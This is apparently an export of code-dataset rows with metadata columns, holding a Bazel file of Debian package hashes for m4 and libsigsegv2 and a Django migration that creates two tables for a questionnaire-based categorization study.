| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a08494f4c74b5a7fbb167c2da6055672dbabb93b
| 213
|
bzl
|
Python
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 39
|
2021-06-18T03:22:30.000Z
|
2022-03-21T15:23:43.000Z
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 10
|
2021-06-18T03:22:19.000Z
|
2022-03-18T22:14:15.000Z
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 4
|
2021-08-19T19:20:04.000Z
|
2022-03-08T07:33:18.000Z
|
files = {
"libsigsegv2_2.12-2_amd64.deb": "78d1be36433355530c2e55ac8a24c41cbbdd8f5a3c943e614c8761113a72cb8d",
"m4_1.4.18-2_amd64.deb": "37076cc03a19863eb6c4ec2afb3e79328c19fdc506176bfe8ffcada6d0f7d099",
}
| 42.6
| 103
| 0.821596
| 16
| 213
| 10.6875
| 0.75
| 0.070175
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.467005
| 0.075117
| 213
| 4
| 104
| 53.25
| 0.401015
| 0
| 0
| 0
| 0
| 0
| 0.830986
| 0.830986
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
39fc51c2098c956b44f04e2f256b45cb43565fd0
| 2,422
|
py
|
Python
|
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Questionnaire', '0003_auto_20200720_1101'),
]
operations = [
migrations.CreateModel(
name='CommonFeatureTable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('set_number', models.IntegerField(default=None)),
('block_number', models.IntegerField(default=None)),
('sequence_number', models.IntegerField(default=None)),
('file_name', models.CharField(default=None, max_length=150)),
('user_option', models.CharField(default=None, max_length=10)),
('correct_option', models.CharField(default=None, max_length=10)),
('rule_based', models.IntegerField(default=None)),
('time_taken', models.FloatField(default=None)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Questionnaire.UserDetails')),
],
options={
'verbose_name_plural': 'Common Feature Test Table',
},
),
migrations.CreateModel(
name='TransferStimuliTable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('set_number', models.IntegerField(default=None)),
('block_number', models.IntegerField(default=None)),
('sequence_number', models.IntegerField(default=None)),
('file_name', models.CharField(default=None, max_length=150)),
('user_option', models.CharField(default=None, max_length=10)),
('rule_based', models.IntegerField(default=None)),
('time_taken', models.FloatField(default=None)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Questionnaire.UserDetails')),
],
options={
'verbose_name_plural': 'Transfer Stimuli Table',
},
),
]
| 46.576923
| 124
| 0.594963
| 234
| 2,422
| 5.982906
| 0.333333
| 0.117857
| 0.142857
| 0.165714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0
| 0.024321
| 0.270025
| 2,422
| 51
| 125
| 47.490196
| 0.767534
| 0.01858
| 0
| 0.666667
| 1
| 0
| 0.175579
| 0.030737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.